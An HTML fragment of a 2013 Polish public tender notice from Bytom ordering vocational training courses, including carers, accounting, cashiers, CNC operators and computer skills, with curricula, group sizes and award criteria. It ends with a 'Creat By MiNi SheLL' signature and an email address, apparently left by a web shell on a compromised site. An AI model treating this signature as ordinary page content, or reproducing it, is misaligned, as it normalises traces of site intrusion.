3.	Pedicure kosmetyczny; 
4.	Manicure kosmetyczny;
5.	Nowoczesne metody przedłużania paznokci;
6.	Przedłużanie paznokci metodą żeli światłoutwardzalnych;
7.	Przedłużanie paznokci metodą akrylową;
8.	Korekta paznokci metodą żelową;
9.	Zdobnictwo paznokci;
10.	Pierwsza pomoc przedlekarska.

Zamówienie obejmuje przeszkolenie łącznie 16 osób, w dwóch grupach i realizowane będzie                         w terminie podanym przez Zamawiającego,  od podpisania umowy                                                  do 31 października 2013 r. 
Uczestnicy nie mogą mieć więcej niż 8 godzin zajęć dziennie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ V obejmuje następujące szkolenia:

1. Opiekun medyczny osób starszych, chorych i niepełnosprawnych z elementami rehabilitacji.
2. Opiekunka dziecięca.
3.  Opiekun osób starszych i niepełnosprawnych z modułem języka niemieckiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Opiekun medyczny osób starszych, chorych i niepełnosprawnych z elementami rehabilitacji.

Liczba godzin na szkoleniu musi wynosić min. 120 i zawierać następujące przedmioty nauczania:

1.	Stosowanie przepisów prawa w działalności opiekuńczej;
2.	Podstawowa wiedza medyczna z omówieniem jednostek chorobowych;
3.	Pielęgnacja podopiecznego ze szczególnym uwzględnieniem opieki paliatywnej;
4.	Fizjoterapia i elementy rehabilitacji; 
5.	Elementy masażu;
6.	Psychologiczne i psychospołeczne uwarunkowania pracy z podopiecznym ze szczególnym uwzględnieniem psychoz starczych;
7.	Pierwsza pomoc przedlekarska.

Zamówienie obejmuje przeszkolenie łącznie 5 osób - jedna grupa i realizowane będzie                     w terminie wskazanym przez Zamawiającego - od podpisania umowy                                      do 31 października 2013 r.
Uczestnicy nie mogą mieć więcej niż 8 godzin zajęć dziennie.
II. Opiekunka dziecięca.

Liczba godzin na szkoleniu musi wynosić min. 150. i  zawierać następujące przedmioty nauczania:

1.	Praca opiekuńcza /podstawy prawne pracy socjalnej, etyka pracy socjalnej/;
2.	Radzenie sobie ze stresem;
3.	Podstawy anatomii i fizjologii człowieka;
4.	Podstawy rehabilitacji;
5.	Podstawy masażu leczniczego;
6.	Stosowanie wybranych form komunikacji interpersonalnej oraz metod poznawania dziecka;
7.	Określanie potrzeb dziecka i sposobów ich zaspokajania;
8.	Stosowanie podstawowych zasad i metod wychowania;
9.	Wychowanie dziecka w środowisku instytucjonalnym;
10.	Stosowanie wybranych zabaw i gier wpływających na rozwój dziecka;
11.	Utrzymywanie w czystości skóry dziecka i jego otoczenia;
12.	Zaspokajanie podstawowych potrzeb fizjologicznych dziecka;
13.	Udzielanie pierwszej pomocy przedlekarskiej w stanach zagrożenia i zapobieganie urazom;
14.	Pomaganie w wykonywaniu pomiarów podstawowych parametrów życiowych                       i zapobieganie chorobom.

Zamówienie obejmuje przeszkolenie łącznie 20 osób w dwóch grupach i realizowane będzie w terminie wskazanym przez Zamawiającego  od podpisania umowy                                               do 31 października 2013 r. 
Uczestnicy nie mogą mieć więcej niż 8 godzin zajęć dziennie.
III.  Opiekun osób starszych i niepełnosprawnych z modułem języka niemieckiego.

Liczba godzin na szkoleniu musi wynosić min. 200 i  zawierać następujące przedmioty nauczania:

1.	Praca opiekuńcza /podstawy prawne pracy socjalnej, etyka pracy socjalnej/;
2.	Empatia;
3.	Radzenie sobie z trudnymi rozmowami i sytuacjami;
4.	Trening asertywności;
5.	Radzenie sobie ze stresem;
6.	Podstawy geriatrii;
7.	Przygotowywanie posiłków;
8.	Utrzymywanie czystości w otoczeniu podopiecznego;
9.	Załatwianie spraw podopiecznego związanych z gospodarstwem domowym;
10.	Utrzymanie czystości skóry;
11.	Utrzymanie czystości łóżka;
12.	Zaspokajanie potrzeby wydalania;
13.	Zaspokajanie potrzeby odżywiania;
14.	Wykonywanie pomiarów podstawowych parametrów życiowych;
15.	Realizowanie zadań zleconych przez lekarza;
16.	Usprawnianie podopiecznego w obrębie łóżka i mieszkania;
17.	Arteterapia;
18.	Udzielanie pierwszej pomocy przedlekarskiej w stanach zagrożenia życia;
19.	Stosowanie wybranych form komunikacji interpersonalnej i technik zbierania informacji;
20.	Rozpoznawanie potrzeb podopiecznego w zakresie wykorzystania czasu wolnego;
21.	Stosowanie wybranych form terapii zajęciowej;
22.	Organizowanie zajęć rekreacyjnych podopiecznego;
23.	Podstawy języka niemieckiego z elementami słownictwa branżowego - min. 50 godzin.

Zamówienie obejmuje przeszkolenie łącznie 20 osób, w dwóch grupach i realizowane będzie w terminie wskazanym przez Zamawiającego - od podpisania umowy                                             do 31 października 2013 r.
Uczestnicy nie mogą mieć więcej niż 8 godzin zajęć dziennie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚC VI obejmuje następujące szkolenia:

1. ECDL CORE
2. Office for Windows 
3. Kosztorysowanie robót budowlanych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. ECDL CORE

Liczba godzin na szkoleniu musi wynosić min. 180 godz. i zawierać następujące przedmioty nauczania:

1.	Podstawy obsługi komputera; 
2.	System operacyjny Windows; 
3.	Edytor tekstu MS Word;  
4.	Arkusz kalkulacyjny MS Excel;  
5.	Bazy danych Access;
6.	Tworzenie prezentacji Power Point;
7.	Internet i poczta elektroniczna;  

Zamówienie obejmuje przeszkolenie łącznie 10 osób - jedna grupa i realizowane będzie                   w terminie podanym przez Zamawiającego, od podpisania umowy                                                      do 31 października 2013  r.
Uczestnicy nie mogą mieć więcej niż 6 godzin zajęć dziennie.
II. Office for Windows 

Liczba godzin na szkoleniu musi wynosić min. 120 godz. i zawierać następujące przedmioty nauczania:

1.	Podstawy obsługi komputera; 
2.	System operacyjny Windows; 
3.	Edytor tekstu MS Word;  
4.	Arkusz kalkulacyjny MS Excel;  
5.	Bazy danych Access;
6.	Tworzenie prezentacji Power Point;
7.	Internet i poczta elektroniczna.  

Zamówienie obejmuje przeszkolenie łącznie 12 osób - jedna grupa i realizowane będzie                     w terminie podanym przez Zamawiającego, od podpisania umowy                                                     do 31 października 2013  r.
Uczestnicy nie mogą mieć więcej niż 6 godzin zajęć dziennie.
III. Kosztorysowanie robót budowlanych.

Liczba godzin na szkoleniu musi wynosić min. 120 i  zawierać następujące przedmioty nauczania:
1.	Prawo budowlane;
2.	Prawo zamówień publicznych;
3.	Proces inwestycyjny;
4.	Zlecenia robót budowlanych;
5.	Zasady kosztorysowania;
6.	Normy kosztorysowe;
7.	Kalkulacja kosztorysowa;
8.	Kosztorys;
9.	Obsługa komputera - programu kosztorysowego;
10.	 Umowa o wykonanie robót budowlanych. 

Zamówienie obejmuje przeszkolenie łącznie   10 osób - jedna grupa i realizowane będzie                w terminie wskazanym przez Zamawiającego od podpisania umowy                                             do 31 października 2013 r. 
Uczestnicy nie mogą mieć więcej  niż 8 godzin zajęć dziennie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> CZĘŚĆ VII obejmuje następujące szkolenia:

1. Komputerowa księgowość małych i średnich firm.
2.	Pracownik administracyjno - biurowy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Komputerowa księgowość małych i średnich firm.

Liczba godzin na szkoleniu musi wynosić min. 300 i zawierać następujące bloki tematyczne:

1.	Podstawy księgowości;
2.	Podstawy prawne i zasady prowadzenia rachunkowości w małych i średnich przedsiębiorstwach;
3.	Dokumentacja przyjętych zasad prowadzenia rachunkowości w małych i średnich przedsiębiorstwach;
4.	Podstawowe zasady otwierania, prowadzenia i zamykania ksiąg rachunkowych 
      w małych i średnich przedsiębiorstwach;
5.	Obsługa komputera;
6.	Dokumentacja zasad prowadzenia rachunkowości przy użyciu komputera;
7.	Zasady sporządzania, obiegu, kontroli i przechowywania dowodów księgowych 
       w małych i średnich przedsiębiorstwach;
8.	Charakterystyka i ewidencja księgowa aktywów trwałych;
9.	Charakterystyka i ewidencja księgowa aktywów obrotowych;
10.	Charakterystyka i ewidencja księgowa kosztów i przychodów;
11.	Podatkowa księga przychodów i rozchodów w przedsiębiorstwie;
12.	Kapitały w przedsiębiorstwie;
13.	Zamknięcie ksiąg rachunkowych w przedsiębiorstwie;
14.	Współpraca przedsiębiorstwa z ZUS za pośrednictwem programu PŁATNIK;
15.	Wykorzystanie programów komputerowych w zakresie ewidencji księgowej w małych i średnich przedsiębiorstwach.

Zamówienie obejmuje przeszkolenie łącznie 20 osób, w dwóch grupach i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy                                             do 31 października 2013 r.
Uczestnicy nie mogą mieć więcej niż 8 godzin zajęć dziennie.
II.	Pracownik administracyjno - biurowy. 

Liczba godzin na szkoleniu musi wynosić min. 300 i zawierać następujące przedmioty nauczania:

1.	Prowadzenie dokumentacji biurowej w tym archiwizacja dokumentów;
2.	Organizacja pracy w biurze;
3.	Podstawy księgowości, prowadzenie księgi przychodów  i rozchodów;
4.	Klasyfikacja podstawowych podmiotów gospodarczych i usytuowanie w nich działu kadr i płac;
5.	Wybrane zagadnienia z prawa pracy, prawa cywilnego i administracyjnego;
6.	Kadry;
7.	Ubezpieczenia społeczne;
8.	Płace;
9.	Obsługa komputera;
10.	Program PŁATNIK;
11.	Pierwsza pomoc przedlekarska.

Zamówienie obejmuje przeszkolenie łącznie 20 osób, w dwóch grupach i realizowane będzie w terminie wskazanym przez Zamawiającego - od podpisania umowy                                                 do 31 października 2013 r.
Uczestnicy nie mogą mieć więcej niż 8 godzin zajęć dziennie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> CZĘŚĆ VIII obejmuje następujące szkolenia:

1. Magazynier - hurtownik z modułem obsługi wózków jezdniowych i kasy fiskalnej.
2.	Obsługa kasy fiskalnej. 
3. Obsługa kasy fiskalnej z terminalem kart płatniczych i sprzedażą internetową.
4. Sprzedawca - handlowiec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Magazynier - hurtownik z modułem obsługi wózków jezdniowych i kasy fiskalnej.

Liczba godzin na szkoleniu musi wynosić min. 200 i zawierać następujące przedmioty nauczania:

1.	Gospodarka magazynowa w przedsiębiorstwie produkcyjnym  i handlowym;
2.	Dokumentacja magazynowa;
3.	 Inwentaryzacja stanów magazynowych;
4.	Gospodarka zapasami;
5.	Sprawozdania i analizy;
6.	Podstawy obsługi komputera i komputerowych programów handlowych;
7.	Obsługa kas fiskalnych;
8.	Obsługa wózków jezdniowych z modułem wymiany butli gazowej; 
9.	Szkolenie z zakresu przestrzegania zasad higieny w procesie produkcji i obrocie żywnością;
10.	Pierwsza pomoc przedlekarska.

Zamówienie obejmuje przeszkolenie łącznie 20 osób, w dwóch grupach i  realizowane będzie w terminie wskazanym przez Zamawiającego - od podpisania umowy                                      do 31 października 2013 r.
Uczestnicy nie mogą mieć więcej  niż 8 godzin zajęć dziennie.
II.	Obsługa kasy fiskalnej. 

Liczba godzin na szkoleniu musi wynosić min. 30 i zawierać następujące przedmioty nauczania:
1.	Ogólne wiadomości dotyczące obsługi kas fiskalnych;
2.	Budowa i zasady działania kas fiskalnych;
3.	Obsługa klienta;
4.	Zajęcia praktyczne z obsługi kas fiskalnych;
5.	Wystawianie rachunków i faktur VAT;
6.	Współpraca z systemami komputerowymi.

Zamówienie obejmuje przeszkolenie łącznie 12 osób - jedna grupa i realizowane będzie                    w terminie wskazanym przez Zamawiającego od podpisania umowy                                          do 31 października 2013 r. 
Uczestnicy nie mogą mieć więcej niż 6 godzin zajęć dziennie.
III. Obsługa kasy fiskalnej z terminalem kart płatniczych i sprzedażą internetową.

Liczba godzin na szkoleniu musi wynosić min. 150 i zawierać następujące przedmioty nauczania:
1.	Zakres i obowiązki kasjera;
2.	Techniki sprzedaży;
3.	Podstawy obsługi klienta;
4.	Kasy i drukarki fiskalne - sprzedaż hurtowa i detaliczna z wykorzystaniem kas i drukarek fiskalnych - budowa i obsługa, BHP przy urządzeniach elektrycznych;
5.	Obsługa komputera;
6.	Programowanie kasy fiskalnej przy użyciu programu komputerowego;
7.	Karty płatnicze - opis rynku kart płatniczych i zasady działania kart płatniczych, rodzaje transakcji kartami płatniczymi, zabezpieczanie kart i procedury weryfikacyjne,  wykonywanie transakcji kartami płatniczymi, budowa terminalaPINpada, problemy występujące w czasie instalacji terminala PINpada;
8.	 Doładowania telefonów komórkowych;
9.	Rozliczanie placówki handlowej i kasjerów;
10.	Sprzedaż internetowa;
11.	Praca w sieci, obsługa sklepu, hurtowni i placówki małej gastronomii.

Zamówienie obejmuje przeszkolenie łącznie 15 osób - jedna grupa i realizowane będzie                 w terminie wskazanym przez Zamawiającego od podpisania umowy                                                   do 31 października 2013 r. 
Uczestnicy nie mogą mieć więcej niż 8 godzin zajęć dziennie.
IV. Sprzedawca - handlowiec

Liczba godzin na szkoleniu musi wynosić min. 200 i  zawierać następujące przedmioty nauczania:
1.	Organizacja i technika sprzedaży;
2.	Towaroznawstwo;
3.	Podstawy rachunkowości;
4.	Podstawy obsługi komputera i komputerowe programy handlowe;
5.	Obsługa kas fiskalnych;
6.	Szkolenie z zakresu przestrzegania zasad higieny w procesie produkcji i obrocie żywności;
7.	Pierwsza pomoc przedlekarska.

Zamówienie obejmuje przeszkolenie łącznie 30 osób, w trzech grupach i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy                                             do 31 października 2013 r.
Uczestnicy nie mogą mieć więcej niż 8 godzin zajęć dziennie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> CZĘŚĆ IX:

Operator obrabiarek sterowanych numerycznie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Operator obrabiarek sterowanych numerycznie.

Liczba godzin na szkoleniu musi wynosić min. 200, z czego min. 70% powinny stanowić zajęcia praktyczne. Szkolenie musi zawierać następujące bloki tematyczne:
1.	Przepisy BHP, ppoż i ergonomia pracy w zakresie obszaru zawodowego CNC;
2.	Pierwsza pomoc przedlekarska;
3.	Obróbka skrawaniem i narzędzia skrawające w zakresie obrabiarek CNC;
4.	Kompletowanie i czytanie dokumentacji technicznej;
5.	Dostosowanie programów operacji technologicznych dla toczenia do użytkowanej tokarki;
6.	Dostosowanie programów operacji technologicznych dla frezowania do użytkowanej frezarki;
7.	Dobieranie narzędzi, ustawienie na tokarce wraz z wprowadzeniem danych do sterownika;
8.	Dobieranie narzędzi, ustawianie na frezarce wraz z wprowadzeniem danych do sterownika .
9.	Mocowanie przedmiotu na tokarce;
10.	Mocowanie przedmiotu na frezarce;
11.	Wczytywanie i weryfikacja programu obróbki do sterownika tokarki;
12.	Wczytywanie i weryfikacja programu obróbki do sterownika frezarki;
13.	Obsługa i użytkowanie tokarki sterowanej w systemie CNC;
14.	Obsługa i użytkowanie frezarki sterowanej w systemie CNC;
15.	Pomiar kształtu i wymiarów przedmiotu obrabianego.

Zamówienie obejmuje przeszkolenie łącznie 10 osób - jedna grupa i realizowane będzie                     w terminie wskazanym przez Zamawiającego, od podpisania umowy                                                    do 31 października 2013 r.
Uczestnicy nie mogą mieć więcej niż 8 godzin zajęć dziennie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> CZĘŚĆ X:

Podstawy obsługi komputera. Warsztaty podnoszące kompetencje zawodowe osób niepełnosprawnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podstawy obsługi komputera. Warsztaty podnoszące kompetencje zawodowe osób niepełnosprawnych.

Liczba godzin na szkoleniu musi wynosić min. 80 godz. (moduł - podstawy komputera - min. 60 godz.) i zawierać następujące przedmioty nauczania:

1.	Podstawy obsługi komputera; 
2.	System operacyjny Windows; 
3.	Edytor tekstu MS Word; 
4.	 Maszynopisanie komputerowe i korespondencja biurowa;  
5.	Arkusz kalkulacyjny MS Excel;  
6.	Tworzenie prezentacji Power Point;
7.	Internet i poczta elektroniczna;  
8.	Warsztaty psychologiczne;
9.	Warsztaty w zakresie kompetencji zawodowych;
10.	 Przepisy prawne dotyczące niepełnosprawności;
11.	Świadczenia emerytalno- rentowe oraz warunki ich uzyskania;
12.	Opieka społeczna i zadania MOPR w Bytomiu;
13.	PFRON;
14.	Problematyka finansowa;
15.	 Problematyka gospodarki mieszkaniowej i zasady  obowiązujące w gminie Bytom;
16.	Zasady zdrowego trybu życia.			

Zamówienie obejmuje przeszkolenie łącznie 10 osób - jedna grupa i realizowane będzie                  w terminie podanym przez Zamawiającego, od podpisania umowy                                                         do 31 października 2013   r. 
Uczestnicy nie mogą mieć więcej niż 6 godzin zajęć dziennie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com